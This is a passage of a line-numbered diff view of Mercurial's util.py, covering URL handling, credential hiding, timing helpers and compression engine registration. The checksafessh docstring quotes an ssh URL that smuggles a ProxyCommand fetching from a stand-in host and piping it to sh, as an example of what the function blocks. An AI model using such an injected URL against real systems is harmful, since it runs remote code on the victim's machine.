2770 elif self.scheme and (not self.path or self.path.startswith('/')
2758 or hasdriveletter(self.path)):
2771 or hasdriveletter(self.path)):
2759 s += '//'
2772 s += '//'
2760 if hasdriveletter(self.path):
2773 if hasdriveletter(self.path):
2761 s += '/'
2774 s += '/'
2762 if self.user:
2775 if self.user:
2763 s += urlreq.quote(self.user, safe=self._safechars)
2776 s += urlreq.quote(self.user, safe=self._safechars)
2764 if self.passwd:
2777 if self.passwd:
2765 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2778 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2766 if self.user or self.passwd:
2779 if self.user or self.passwd:
2767 s += '@'
2780 s += '@'
2768 if self.host:
2781 if self.host:
2769 if not (self.host.startswith('[') and self.host.endswith(']')):
2782 if not (self.host.startswith('[') and self.host.endswith(']')):
2770 s += urlreq.quote(self.host)
2783 s += urlreq.quote(self.host)
2771 else:
2784 else:
2772 s += self.host
2785 s += self.host
2773 if self.port:
2786 if self.port:
2774 s += ':' + urlreq.quote(self.port)
2787 s += ':' + urlreq.quote(self.port)
2775 if self.host:
2788 if self.host:
2776 s += '/'
2789 s += '/'
2777 if self.path:
2790 if self.path:
2778 # TODO: similar to the query string, we should not unescape the
2791 # TODO: similar to the query string, we should not unescape the
2779 # path when we store it, the path might contain '%2f' = '/',
2792 # path when we store it, the path might contain '%2f' = '/',
2780 # which we should *not* escape.
2793 # which we should *not* escape.
2781 s += urlreq.quote(self.path, safe=self._safepchars)
2794 s += urlreq.quote(self.path, safe=self._safepchars)
2782 if self.query:
2795 if self.query:
2783 # we store the query in escaped form.
2796 # we store the query in escaped form.
2784 s += '?' + self.query
2797 s += '?' + self.query
2785 if self.fragment is not None:
2798 if self.fragment is not None:
2786 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2799 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2787 return s
2800 return s
2788
2801
2789 __str__ = encoding.strmethod(__bytes__)
2802 __str__ = encoding.strmethod(__bytes__)
2790
2803
2791 def authinfo(self):
2804 def authinfo(self):
2792 user, passwd = self.user, self.passwd
2805 user, passwd = self.user, self.passwd
2793 try:
2806 try:
2794 self.user, self.passwd = None, None
2807 self.user, self.passwd = None, None
2795 s = bytes(self)
2808 s = bytes(self)
2796 finally:
2809 finally:
2797 self.user, self.passwd = user, passwd
2810 self.user, self.passwd = user, passwd
2798 if not self.user:
2811 if not self.user:
2799 return (s, None)
2812 return (s, None)
2800 # authinfo[1] is passed to urllib2 password manager, and its
2813 # authinfo[1] is passed to urllib2 password manager, and its
2801 # URIs must not contain credentials. The host is passed in the
2814 # URIs must not contain credentials. The host is passed in the
2802 # URIs list because Python < 2.4.3 uses only that to search for
2815 # URIs list because Python < 2.4.3 uses only that to search for
2803 # a password.
2816 # a password.
2804 return (s, (None, (s, self.host),
2817 return (s, (None, (s, self.host),
2805 self.user, self.passwd or ''))
2818 self.user, self.passwd or ''))
2806
2819
2807 def isabs(self):
2820 def isabs(self):
2808 if self.scheme and self.scheme != 'file':
2821 if self.scheme and self.scheme != 'file':
2809 return True # remote URL
2822 return True # remote URL
2810 if hasdriveletter(self.path):
2823 if hasdriveletter(self.path):
2811 return True # absolute for our purposes - can't be joined()
2824 return True # absolute for our purposes - can't be joined()
2812 if self.path.startswith(br'\\'):
2825 if self.path.startswith(br'\\'):
2813 return True # Windows UNC path
2826 return True # Windows UNC path
2814 if self.path.startswith('/'):
2827 if self.path.startswith('/'):
2815 return True # POSIX-style
2828 return True # POSIX-style
2816 return False
2829 return False
2817
2830
2818 def localpath(self):
2831 def localpath(self):
2819 if self.scheme == 'file' or self.scheme == 'bundle':
2832 if self.scheme == 'file' or self.scheme == 'bundle':
2820 path = self.path or '/'
2833 path = self.path or '/'
2821 # For Windows, we need to promote hosts containing drive
2834 # For Windows, we need to promote hosts containing drive
2822 # letters to paths with drive letters.
2835 # letters to paths with drive letters.
2823 if hasdriveletter(self._hostport):
2836 if hasdriveletter(self._hostport):
2824 path = self._hostport + '/' + self.path
2837 path = self._hostport + '/' + self.path
2825 elif (self.host is not None and self.path
2838 elif (self.host is not None and self.path
2826 and not hasdriveletter(path)):
2839 and not hasdriveletter(path)):
2827 path = '/' + path
2840 path = '/' + path
2828 return path
2841 return path
2829 return self._origpath
2842 return self._origpath
2830
2843
2831 def islocal(self):
2844 def islocal(self):
2832 '''whether localpath will return something that posixfile can open'''
2845 '''whether localpath will return something that posixfile can open'''
2833 return (not self.scheme or self.scheme == 'file'
2846 return (not self.scheme or self.scheme == 'file'
2834 or self.scheme == 'bundle')
2847 or self.scheme == 'bundle')
2835
2848
2836 def hasscheme(path):
2849 def hasscheme(path):
2837 return bool(url(path).scheme)
2850 return bool(url(path).scheme)
2838
2851
2839 def hasdriveletter(path):
2852 def hasdriveletter(path):
2840 return path and path[1:2] == ':' and path[0:1].isalpha()
2853 return path and path[1:2] == ':' and path[0:1].isalpha()
2841
2854
2842 def urllocalpath(path):
2855 def urllocalpath(path):
2843 return url(path, parsequery=False, parsefragment=False).localpath()
2856 return url(path, parsequery=False, parsefragment=False).localpath()
2844
2857
2845 def checksafessh(path):
2858 def checksafessh(path):
2846 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2859 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2847
2860
2848 This is a sanity check for ssh urls. ssh will parse the first item as
2861 This is a sanity check for ssh urls. ssh will parse the first item as
2849 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2862 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2850 Let's prevent these potentially exploited urls entirely and warn the
2863 Let's prevent these potentially exploited urls entirely and warn the
2851 user.
2864 user.
2852
2865
2853 Raises an error.Abort when the url is unsafe.
2866 Raises an error.Abort when the url is unsafe.
2854 """
2867 """
2855 path = urlreq.unquote(path)
2868 path = urlreq.unquote(path)
2856 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2869 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2857 raise error.Abort(_('potentially unsafe url: %r') %
2870 raise error.Abort(_('potentially unsafe url: %r') %
2858 (pycompat.bytestr(path),))
2871 (pycompat.bytestr(path),))
2859
2872
2860 def hidepassword(u):
2873 def hidepassword(u):
2861 '''hide user credential in a url string'''
2874 '''hide user credential in a url string'''
2862 u = url(u)
2875 u = url(u)
2863 if u.passwd:
2876 if u.passwd:
2864 u.passwd = '***'
2877 u.passwd = '***'
2865 return bytes(u)
2878 return bytes(u)
2866
2879
2867 def removeauth(u):
2880 def removeauth(u):
2868 '''remove all authentication information from a url string'''
2881 '''remove all authentication information from a url string'''
2869 u = url(u)
2882 u = url(u)
2870 u.user = u.passwd = None
2883 u.user = u.passwd = None
2871 return bytes(u)
2884 return bytes(u)
2872
2885
2873 timecount = unitcountfn(
2886 timecount = unitcountfn(
2874 (1, 1e3, _('%.0f s')),
2887 (1, 1e3, _('%.0f s')),
2875 (100, 1, _('%.1f s')),
2888 (100, 1, _('%.1f s')),
2876 (10, 1, _('%.2f s')),
2889 (10, 1, _('%.2f s')),
2877 (1, 1, _('%.3f s')),
2890 (1, 1, _('%.3f s')),
2878 (100, 0.001, _('%.1f ms')),
2891 (100, 0.001, _('%.1f ms')),
2879 (10, 0.001, _('%.2f ms')),
2892 (10, 0.001, _('%.2f ms')),
2880 (1, 0.001, _('%.3f ms')),
2893 (1, 0.001, _('%.3f ms')),
2881 (100, 0.000001, _('%.1f us')),
2894 (100, 0.000001, _('%.1f us')),
2882 (10, 0.000001, _('%.2f us')),
2895 (10, 0.000001, _('%.2f us')),
2883 (1, 0.000001, _('%.3f us')),
2896 (1, 0.000001, _('%.3f us')),
2884 (100, 0.000000001, _('%.1f ns')),
2897 (100, 0.000000001, _('%.1f ns')),
2885 (10, 0.000000001, _('%.2f ns')),
2898 (10, 0.000000001, _('%.2f ns')),
2886 (1, 0.000000001, _('%.3f ns')),
2899 (1, 0.000000001, _('%.3f ns')),
2887 )
2900 )
2888
2901
2889 _timenesting = [0]
2902 _timenesting = [0]
2890
2903
2891 def timed(func):
2904 def timed(func):
2892 '''Report the execution time of a function call to stderr.
2905 '''Report the execution time of a function call to stderr.
2893
2906
2894 During development, use as a decorator when you need to measure
2907 During development, use as a decorator when you need to measure
2895 the cost of a function, e.g. as follows:
2908 the cost of a function, e.g. as follows:
2896
2909
2897 @util.timed
2910 @util.timed
2898 def foo(a, b, c):
2911 def foo(a, b, c):
2899 pass
2912 pass
2900 '''
2913 '''
2901
2914
2902 def wrapper(*args, **kwargs):
2915 def wrapper(*args, **kwargs):
2903 start = timer()
2916 start = timer()
2904 indent = 2
2917 indent = 2
2905 _timenesting[0] += indent
2918 _timenesting[0] += indent
2906 try:
2919 try:
2907 return func(*args, **kwargs)
2920 return func(*args, **kwargs)
2908 finally:
2921 finally:
2909 elapsed = timer() - start
2922 elapsed = timer() - start
2910 _timenesting[0] -= indent
2923 _timenesting[0] -= indent
2911 stderr.write('%s%s: %s\n' %
2924 stderr.write('%s%s: %s\n' %
2912 (' ' * _timenesting[0], func.__name__,
2925 (' ' * _timenesting[0], func.__name__,
2913 timecount(elapsed)))
2926 timecount(elapsed)))
2914 return wrapper
2927 return wrapper
2915
2928
2916 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2929 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2917 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2930 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2918
2931
2919 def sizetoint(s):
2932 def sizetoint(s):
2920 '''Convert a space specifier to a byte count.
2933 '''Convert a space specifier to a byte count.
2921
2934
2922 >>> sizetoint(b'30')
2935 >>> sizetoint(b'30')
2923 30
2936 30
2924 >>> sizetoint(b'2.2kb')
2937 >>> sizetoint(b'2.2kb')
2925 2252
2938 2252
2926 >>> sizetoint(b'6M')
2939 >>> sizetoint(b'6M')
2927 6291456
2940 6291456
2928 '''
2941 '''
2929 t = s.strip().lower()
2942 t = s.strip().lower()
2930 try:
2943 try:
2931 for k, u in _sizeunits:
2944 for k, u in _sizeunits:
2932 if t.endswith(k):
2945 if t.endswith(k):
2933 return int(float(t[:-len(k)]) * u)
2946 return int(float(t[:-len(k)]) * u)
2934 return int(t)
2947 return int(t)
2935 except ValueError:
2948 except ValueError:
2936 raise error.ParseError(_("couldn't parse size: %s") % s)
2949 raise error.ParseError(_("couldn't parse size: %s") % s)
2937
2950
2938 class hooks(object):
2951 class hooks(object):
2939 '''A collection of hook functions that can be used to extend a
2952 '''A collection of hook functions that can be used to extend a
2940 function's behavior. Hooks are called in lexicographic order,
2953 function's behavior. Hooks are called in lexicographic order,
2941 based on the names of their sources.'''
2954 based on the names of their sources.'''
2942
2955
2943 def __init__(self):
2956 def __init__(self):
2944 self._hooks = []
2957 self._hooks = []
2945
2958
2946 def add(self, source, hook):
2959 def add(self, source, hook):
2947 self._hooks.append((source, hook))
2960 self._hooks.append((source, hook))
2948
2961
2949 def __call__(self, *args):
2962 def __call__(self, *args):
2950 self._hooks.sort(key=lambda x: x[0])
2963 self._hooks.sort(key=lambda x: x[0])
2951 results = []
2964 results = []
2952 for source, hook in self._hooks:
2965 for source, hook in self._hooks:
2953 results.append(hook(*args))
2966 results.append(hook(*args))
2954 return results
2967 return results
2955
2968
2956 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2969 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2957 '''Yields lines for a nicely formatted stacktrace.
2970 '''Yields lines for a nicely formatted stacktrace.
2958 Skips the 'skip' last entries, then return the last 'depth' entries.
2971 Skips the 'skip' last entries, then return the last 'depth' entries.
2959 Each file+linenumber is formatted according to fileline.
2972 Each file+linenumber is formatted according to fileline.
2960 Each line is formatted according to line.
2973 Each line is formatted according to line.
2961 If line is None, it yields:
2974 If line is None, it yields:
2962 length of longest filepath+line number,
2975 length of longest filepath+line number,
2963 filepath+linenumber,
2976 filepath+linenumber,
2964 function
2977 function
2965
2978
2966 Not be used in production code but very convenient while developing.
2979 Not be used in production code but very convenient while developing.
2967 '''
2980 '''
2968 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2981 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2969 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2982 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2970 ][-depth:]
2983 ][-depth:]
2971 if entries:
2984 if entries:
2972 fnmax = max(len(entry[0]) for entry in entries)
2985 fnmax = max(len(entry[0]) for entry in entries)
2973 for fnln, func in entries:
2986 for fnln, func in entries:
2974 if line is None:
2987 if line is None:
2975 yield (fnmax, fnln, func)
2988 yield (fnmax, fnln, func)
2976 else:
2989 else:
2977 yield line % (fnmax, fnln, func)
2990 yield line % (fnmax, fnln, func)
2978
2991
2979 def debugstacktrace(msg='stacktrace', skip=0,
2992 def debugstacktrace(msg='stacktrace', skip=0,
2980 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2993 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2981 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2994 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2982 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2995 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2983 By default it will flush stdout first.
2996 By default it will flush stdout first.
2984 It can be used everywhere and intentionally does not require an ui object.
2997 It can be used everywhere and intentionally does not require an ui object.
2985 Not be used in production code but very convenient while developing.
2998 Not be used in production code but very convenient while developing.
2986 '''
2999 '''
2987 if otherf:
3000 if otherf:
2988 otherf.flush()
3001 otherf.flush()
2989 f.write('%s at:\n' % msg.rstrip())
3002 f.write('%s at:\n' % msg.rstrip())
2990 for line in getstackframes(skip + 1, depth=depth):
3003 for line in getstackframes(skip + 1, depth=depth):
2991 f.write(line)
3004 f.write(line)
2992 f.flush()
3005 f.flush()
2993
3006
2994 class dirs(object):
3007 class dirs(object):
2995 '''a multiset of directory names from a dirstate or manifest'''
3008 '''a multiset of directory names from a dirstate or manifest'''
2996
3009
2997 def __init__(self, map, skip=None):
3010 def __init__(self, map, skip=None):
2998 self._dirs = {}
3011 self._dirs = {}
2999 addpath = self.addpath
3012 addpath = self.addpath
3000 if safehasattr(map, 'iteritems') and skip is not None:
3013 if safehasattr(map, 'iteritems') and skip is not None:
3001 for f, s in map.iteritems():
3014 for f, s in map.iteritems():
3002 if s[0] != skip:
3015 if s[0] != skip:
3003 addpath(f)
3016 addpath(f)
3004 else:
3017 else:
3005 for f in map:
3018 for f in map:
3006 addpath(f)
3019 addpath(f)
3007
3020
3008 def addpath(self, path):
3021 def addpath(self, path):
3009 dirs = self._dirs
3022 dirs = self._dirs
3010 for base in finddirs(path):
3023 for base in finddirs(path):
3011 if base in dirs:
3024 if base in dirs:
3012 dirs[base] += 1
3025 dirs[base] += 1
3013 return
3026 return
3014 dirs[base] = 1
3027 dirs[base] = 1
3015
3028
3016 def delpath(self, path):
3029 def delpath(self, path):
3017 dirs = self._dirs
3030 dirs = self._dirs
3018 for base in finddirs(path):
3031 for base in finddirs(path):
3019 if dirs[base] > 1:
3032 if dirs[base] > 1:
3020 dirs[base] -= 1
3033 dirs[base] -= 1
3021 return
3034 return
3022 del dirs[base]
3035 del dirs[base]
3023
3036
3024 def __iter__(self):
3037 def __iter__(self):
3025 return iter(self._dirs)
3038 return iter(self._dirs)
3026
3039
3027 def __contains__(self, d):
3040 def __contains__(self, d):
3028 return d in self._dirs
3041 return d in self._dirs
3029
3042
3030 if safehasattr(parsers, 'dirs'):
3043 if safehasattr(parsers, 'dirs'):
3031 dirs = parsers.dirs
3044 dirs = parsers.dirs
3032
3045
3033 def finddirs(path):
3046 def finddirs(path):
3034 pos = path.rfind('/')
3047 pos = path.rfind('/')
3035 while pos != -1:
3048 while pos != -1:
3036 yield path[:pos]
3049 yield path[:pos]
3037 pos = path.rfind('/', 0, pos)
3050 pos = path.rfind('/', 0, pos)
3038
3051
3039 # compression code
3052 # compression code
3040
3053
3041 SERVERROLE = 'server'
3054 SERVERROLE = 'server'
3042 CLIENTROLE = 'client'
3055 CLIENTROLE = 'client'
3043
3056
3044 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3057 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3045 (u'name', u'serverpriority',
3058 (u'name', u'serverpriority',
3046 u'clientpriority'))
3059 u'clientpriority'))
3047
3060
3048 class compressormanager(object):
3061 class compressormanager(object):
3049 """Holds registrations of various compression engines.
3062 """Holds registrations of various compression engines.
3050
3063
3051 This class essentially abstracts the differences between compression
3064 This class essentially abstracts the differences between compression
3052 engines to allow new compression formats to be added easily, possibly from
3065 engines to allow new compression formats to be added easily, possibly from
3053 extensions.
3066 extensions.
3054
3067
3055 Compressors are registered against the global instance by calling its
3068 Compressors are registered against the global instance by calling its
3056 ``register()`` method.
3069 ``register()`` method.
3057 """
3070 """
3058 def __init__(self):
3071 def __init__(self):
3059 self._engines = {}
3072 self._engines = {}
3060 # Bundle spec human name to engine name.
3073 # Bundle spec human name to engine name.
3061 self._bundlenames = {}
3074 self._bundlenames = {}
3062 # Internal bundle identifier to engine name.
3075 # Internal bundle identifier to engine name.
3063 self._bundletypes = {}
3076 self._bundletypes = {}
3064 # Revlog header to engine name.
3077 # Revlog header to engine name.
3065 self._revlogheaders = {}
3078 self._revlogheaders = {}
3066 # Wire proto identifier to engine name.
3079 # Wire proto identifier to engine name.
3067 self._wiretypes = {}
3080 self._wiretypes = {}
3068
3081
3069 def __getitem__(self, key):
3082 def __getitem__(self, key):
3070 return self._engines[key]
3083 return self._engines[key]
3071
3084
3072 def __contains__(self, key):
3085 def __contains__(self, key):
3073 return key in self._engines
3086 return key in self._engines
3074
3087
3075 def __iter__(self):
3088 def __iter__(self):
3076 return iter(self._engines.keys())
3089 return iter(self._engines.keys())
3077
3090
3078 def register(self, engine):
3091 def register(self, engine):
3079 """Register a compression engine with the manager.
3092 """Register a compression engine with the manager.
3080
3093
3081 The argument must be a ``compressionengine`` instance.
3094 The argument must be a ``compressionengine`` instance.
3082 """
3095 """
3083 if not isinstance(engine, compressionengine):
3096 if not isinstance(engine, compressionengine):
3084 raise ValueError(_('argument must be a compressionengine'))
3097 raise ValueError(_('argument must be a compressionengine'))
3085
3098
3086 name = engine.name()
3099 name = engine.name()
3087
3100
3088 if name in self._engines:
3101 if name in self._engines:
3089 raise error.Abort(_('compression engine %s already registered') %
3102 raise error.Abort(_('compression engine %s already registered') %
3090 name)
3103 name)
3091
3104
3092 bundleinfo = engine.bundletype()
3105 bundleinfo = engine.bundletype()
3093 if bundleinfo:
3106 if bundleinfo:
3094 bundlename, bundletype = bundleinfo
3107 bundlename, bundletype = bundleinfo
3095
3108
3096 if bundlename in self._bundlenames:
3109 if bundlename in self._bundlenames:
3097 raise error.Abort(_('bundle name %s already registered') %
3110 raise error.Abort(_('bundle name %s already registered') %
3098 bundlename)
3111 bundlename)
3099 if bundletype in self._bundletypes:
3112 if bundletype in self._bundletypes:
3100 raise error.Abort(_('bundle type %s already registered by %s') %
3113 raise error.Abort(_('bundle type %s already registered by %s') %
3101 (bundletype, self._bundletypes[bundletype]))
3114 (bundletype, self._bundletypes[bundletype]))
3102
3115
3103 # No external facing name declared.
3116 # No external facing name declared.
3104 if bundlename:
3117 if bundlename:
3105 self._bundlenames[bundlename] = name
3118 self._bundlenames[bundlename] = name
3106
3119
3107 self._bundletypes[bundletype] = name
3120 self._bundletypes[bundletype] = name
3108
3121
3109 wiresupport = engine.wireprotosupport()
3122 wiresupport = engine.wireprotosupport()
3110 if wiresupport:
3123 if wiresupport:
3111 wiretype = wiresupport.name
3124 wiretype = wiresupport.name
3112 if wiretype in self._wiretypes:
3125 if wiretype in self._wiretypes:
3113 raise error.Abort(_('wire protocol compression %s already '
3126 raise error.Abort(_('wire protocol compression %s already '
3114 'registered by %s') %
3127 'registered by %s') %
3115 (wiretype, self._wiretypes[wiretype]))
3128 (wiretype, self._wiretypes[wiretype]))
3116
3129
3117 self._wiretypes[wiretype] = name
3130 self._wiretypes[wiretype] = name
3118
3131
3119 revlogheader = engine.revlogheader()
3132 revlogheader = engine.revlogheader()
3120 if revlogheader and revlogheader in self._revlogheaders:
3133 if revlogheader and revlogheader in self._revlogheaders:
3121 raise error.Abort(_('revlog header %s already registered by %s') %
3134 raise error.Abort(_('revlog header %s already registered by %s') %
3122 (revlogheader, self._revlogheaders[revlogheader]))
3135 (revlogheader, self._revlogheaders[revlogheader]))
3123
3136
3124 if revlogheader:
3137 if revlogheader:
3125 self._revlogheaders[revlogheader] = name
3138 self._revlogheaders[revlogheader] = name
3126
3139
3127 self._engines[name] = engine
3140 self._engines[name] = engine
3128
3141
3129 @property
3142 @property
3130 def supportedbundlenames(self):
3143 def supportedbundlenames(self):
3131 return set(self._bundlenames.keys())
3144 return set(self._bundlenames.keys())
3132
3145
3133 @property
3146 @property
3134 def supportedbundletypes(self):
3147 def supportedbundletypes(self):
3135 return set(self._bundletypes.keys())
3148 return set(self._bundletypes.keys())
3136
3149
3137 def forbundlename(self, bundlename):
3150 def forbundlename(self, bundlename):
3138 """Obtain a compression engine registered to a bundle name.
3151 """Obtain a compression engine registered to a bundle name.
3139
3152
3140 Will raise KeyError if the bundle type isn't registered.
3153 Will raise KeyError if the bundle type isn't registered.
3141
3154
3142 Will abort if the engine is known but not available.
3155 Will abort if the engine is known but not available.
3143 """
3156 """
3144 engine = self._engines[self._bundlenames[bundlename]]
3157 engine = self._engines[self._bundlenames[bundlename]]
3145 if not engine.available():
3158 if not engine.available():
3146 raise error.Abort(_('compression engine %s could not be loaded') %
3159 raise error.Abort(_('compression engine %s could not be loaded') %
3147 engine.name())
3160 engine.name())
3148 return engine
3161 return engine
3149
3162
3150 def forbundletype(self, bundletype):
3163 def forbundletype(self, bundletype):
3151 """Obtain a compression engine registered to a bundle type.
3164 """Obtain a compression engine registered to a bundle type.
3152
3165
3153 Will raise KeyError if the bundle type isn't registered.
3166 Will raise KeyError if the bundle type isn't registered.
3154
3167
3155 Will abort if the engine is known but not available.
3168 Will abort if the engine is known but not available.
3156 """
3169 """
3157 engine = self._engines[self._bundletypes[bundletype]]
3170 engine = self._engines[self._bundletypes[bundletype]]
3158 if not engine.available():
3171 if not engine.available():
3159 raise error.Abort(_('compression engine %s could not be loaded') %
3172 raise error.Abort(_('compression engine %s could not be loaded') %
3160 engine.name())
3173 engine.name())
3161 return engine
3174 return engine
3162
3175
3163 def supportedwireengines(self, role, onlyavailable=True):
3176 def supportedwireengines(self, role, onlyavailable=True):
3164 """Obtain compression engines that support the wire protocol.
3177 """Obtain compression engines that support the wire protocol.
3165
3178
3166 Returns a list of engines in prioritized order, most desired first.
3179 Returns a list of engines in prioritized order, most desired first.
3167
3180
3168 If ``onlyavailable`` is set, filter out engines that can't be
3181 If ``onlyavailable`` is set, filter out engines that can't be
3169 loaded.
3182 loaded.
3170 """
3183 """
3171 assert role in (SERVERROLE, CLIENTROLE)
3184 assert role in (SERVERROLE, CLIENTROLE)
3172
3185
3173 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3186 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3174
3187
3175 engines = [self._engines[e] for e in self._wiretypes.values()]
3188 engines = [self._engines[e] for e in self._wiretypes.values()]
3176 if onlyavailable:
3189 if onlyavailable:
3177 engines = [e for e in engines if e.available()]
3190 engines = [e for e in engines if e.available()]
3178
3191
3179 def getkey(e):
3192 def getkey(e):
3180 # Sort first by priority, highest first. In case of tie, sort
3193 # Sort first by priority, highest first. In case of tie, sort
3181 # alphabetically. This is arbitrary, but ensures output is
3194 # alphabetically. This is arbitrary, but ensures output is
3182 # stable.
3195 # stable.
3183 w = e.wireprotosupport()
3196 w = e.wireprotosupport()
3184 return -1 * getattr(w, attr), w.name
3197 return -1 * getattr(w, attr), w.name
3185
3198
3186 return list(sorted(engines, key=getkey))
3199 return list(sorted(engines, key=getkey))
3187
3200
3188 def forwiretype(self, wiretype):
3201 def forwiretype(self, wiretype):
3189 engine = self._engines[self._wiretypes[wiretype]]
3202 engine = self._engines[self._wiretypes[wiretype]]
3190 if not engine.available():
3203 if not engine.available():
3191 raise error.Abort(_('compression engine %s could not be loaded') %
3204 raise error.Abort(_('compression engine %s could not be loaded') %
3192 engine.name())
3205 engine.name())
3193 return engine
3206 return engine
3194
3207
3195 def forrevlogheader(self, header):
3208 def forrevlogheader(self, header):
3196 """Obtain a compression engine registered to a revlog header.
3209 """Obtain a compression engine registered to a revlog header.
3197
3210
3198 Will raise KeyError if the revlog header value isn't registered.
3211 Will raise KeyError if the revlog header value isn't registered.
3199 """
3212 """
3200 return self._engines[self._revlogheaders[header]]
3213 return self._engines[self._revlogheaders[header]]
3201
3214
3202 compengines = compressormanager()
3215 compengines = compressormanager()
3203
3216
3204 class compressionengine(object):
3217 class compressionengine(object):
3205 """Base class for compression engines.
3218 """Base class for compression engines.
3206
3219
3207 Compression engines must implement the interface defined by this class.
3220 Compression engines must implement the interface defined by this class.
3208 """
3221 """
3209 def name(self):
3222 def name(self):
3210 """Returns the name of the compression engine.
3223 """Returns the name of the compression engine.
3211
3224
3212 This is the key the engine is registered under.
3225 This is the key the engine is registered under.
3213
3226
3214 This method must be implemented.
3227 This method must be implemented.
3215 """
3228 """
3216 raise NotImplementedError()
3229 raise NotImplementedError()
3217
3230
3218 def available(self):
3231 def available(self):
3219 """Whether the compression engine is available.
3232 """Whether the compression engine is available.
3220
3233
3221 The intent of this method is to allow optional compression engines
3234 The intent of this method is to allow optional compression engines
3222 that may not be available in all installations (such as engines relying
3235 that may not be available in all installations (such as engines relying
3223 on C extensions that may not be present).
3236 on C extensions that may not be present).
3224 """
3237 """
3225 return True
3238 return True
3226
3239
3227 def bundletype(self):
3240 def bundletype(self):
3228 """Describes bundle identifiers for this engine.
3241 """Describes bundle identifiers for this engine.
3229
3242
3230 If this compression engine isn't supported for bundles, returns None.
3243 If this compression engine isn't supported for bundles, returns None.
3231
3244
3232 If this engine can be used for bundles, returns a 2-tuple of strings of
3245 If this engine can be used for bundles, returns a 2-tuple of strings of
3233 the user-facing "bundle spec" compression name and an internal
3246 the user-facing "bundle spec" compression name and an internal
3234 identifier used to denote the compression format within bundles. To
3247 identifier used to denote the compression format within bundles. To
3235 exclude the name from external usage, set the first element to ``None``.
3248 exclude the name from external usage, set the first element to ``None``.
3236
3249
3237 If bundle compression is supported, the class must also implement
3250 If bundle compression is supported, the class must also implement
3238 ``compressstream`` and `decompressorreader``.
3251 ``compressstream`` and `decompressorreader``.
3239
3252
3240 The docstring of this method is used in the help system to tell users
3253 The docstring of this method is used in the help system to tell users
3241 about this engine.
3254 about this engine.
3242 """
3255 """
3243 return None
3256 return None
3244
3257
3245 def wireprotosupport(self):
3258 def wireprotosupport(self):
3246 """Declare support for this compression format on the wire protocol.
3259 """Declare support for this compression format on the wire protocol.
3247
3260
3248 If this compression engine isn't supported for compressing wire
3261 If this compression engine isn't supported for compressing wire
3249 protocol payloads, returns None.
3262 protocol payloads, returns None.
3250
3263
3251 Otherwise, returns ``compenginewireprotosupport`` with the following
3264 Otherwise, returns ``compenginewireprotosupport`` with the following
3252 fields:
3265 fields:
3253
3266
3254 * String format identifier
3267 * String format identifier
3255 * Integer priority for the server
3268 * Integer priority for the server
3256 * Integer priority for the client
3269 * Integer priority for the client
3257
3270
3258 The integer priorities are used to order the advertisement of format
3271 The integer priorities are used to order the advertisement of format
3259 support by server and client. The highest integer is advertised
3272 support by server and client. The highest integer is advertised
3260 first. Integers with non-positive values aren't advertised.
3273 first. Integers with non-positive values aren't advertised.
3261
3274
3262 The priority values are somewhat arbitrary and only used for default
3275 The priority values are somewhat arbitrary and only used for default
3263 ordering. The relative order can be changed via config options.
3276 ordering. The relative order can be changed via config options.
3264
3277
3265 If wire protocol compression is supported, the class must also implement
3278 If wire protocol compression is supported, the class must also implement
3266 ``compressstream`` and ``decompressorreader``.
3279 ``compressstream`` and ``decompressorreader``.
3267 """
3280 """
3268 return None
3281 return None
3269
3282
3270 def revlogheader(self):
3283 def revlogheader(self):
3271 """Header added to revlog chunks that identifies this engine.
3284 """Header added to revlog chunks that identifies this engine.
3272
3285
3273 If this engine can be used to compress revlogs, this method should
3286 If this engine can be used to compress revlogs, this method should
3274 return the bytes used to identify chunks compressed with this engine.
3287 return the bytes used to identify chunks compressed with this engine.
3275 Else, the method should return ``None`` to indicate it does not
3288 Else, the method should return ``None`` to indicate it does not
3276 participate in revlog compression.
3289 participate in revlog compression.
3277 """
3290 """
3278 return None
3291 return None
3279
3292
3280 def compressstream(self, it, opts=None):
3293 def compressstream(self, it, opts=None):
3281 """Compress an iterator of chunks.
3294 """Compress an iterator of chunks.
3282
3295
3283 The method receives an iterator (ideally a generator) of chunks of
3296 The method receives an iterator (ideally a generator) of chunks of
3284 bytes to be compressed. It returns an iterator (ideally a generator)
3297 bytes to be compressed. It returns an iterator (ideally a generator)
3285 of bytes of chunks representing the compressed output.
3298 of bytes of chunks representing the compressed output.
3286
3299
3287 Optionally accepts an argument defining how to perform compression.
3300 Optionally accepts an argument defining how to perform compression.
3288 Each engine treats this argument differently.
3301 Each engine treats this argument differently.
3289 """
3302 """
3290 raise NotImplementedError()
3303 raise NotImplementedError()
3291
3304
3292 def decompressorreader(self, fh):
3305 def decompressorreader(self, fh):
3293 """Perform decompression on a file object.
3306 """Perform decompression on a file object.
3294
3307
3295 Argument is an object with a ``read(size)`` method that returns
3308 Argument is an object with a ``read(size)`` method that returns
